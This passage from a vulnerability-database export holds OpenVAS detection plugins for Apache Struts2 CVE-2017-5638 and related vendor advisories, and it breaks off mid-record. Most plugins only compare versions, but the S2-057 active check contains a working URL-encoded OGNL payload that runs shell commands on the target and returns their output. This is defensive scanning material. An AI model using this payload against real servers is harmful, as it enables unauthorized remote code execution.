script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing an important security\n update according to Microsoft KB4011162", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-11776"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811922", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811922\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\", \"CVE-2017-11776\");\n script_bugtraq_id(101098, 101106);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 09:33:40 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011162\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Outlook fails to establish a secure connection.\n\n - Microsoft Office improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain the email content of a user, also could execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2016.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011162\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\nif(!outlookVer || outlookVer !~ \"^16\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"16.0\", test_version2:\"16.0.4600.0999\"))\n{\n report = 'File checked: ' + outlookFile + \"\\outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 16.0 - 16.0.4600.0999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-29T22:07:15", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3506", "CVE-2017-5638", "CVE-2016-1181"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810748\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-5638\", \"CVE-2016-1181\", \"CVE-2017-3506\");\n script_bugtraq_id(96729, 91068, 97884);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 14:58:02 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to some unspecified error in the 'Samples (Struts 2)' and\n 'Web Services' sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-29T22:08:09", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-07-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10063", "CVE-2017-10147", "CVE-2013-2027", "CVE-2017-10123", "CVE-2017-10334", "CVE-2017-5638", "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10352", "CVE-2017-10178", "CVE-2017-10148", "CVE-2017-10137", "CVE-2017-10336"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310811244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811244\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-10137\", \"CVE-2017-5638\", \"CVE-2017-10147\", \"CVE-2017-10178\", \"CVE-2013-2027\",\n \"CVE-2017-10148\", \"CVE-2017-10063\", \"CVE-2017-10123\", \"CVE-2017-10352\", \"CVE-2017-10271\",\n \"CVE-2017-10152\", \"CVE-2017-10336\", \"CVE-2017-10334\");\n script_bugtraq_id(96729, 99651, 99644, 78027, 99652, 99653, 101304, 101392);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-19 12:53:23 +0530 (Wed, 19 Jul 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to some unspecified errors in the\n 'Sample apps (Struts 2)', 'Core Components', 'Web Container', 'WLST'\n 'Web Services', 'WLS-WebServices' and 'WLS Security' components of 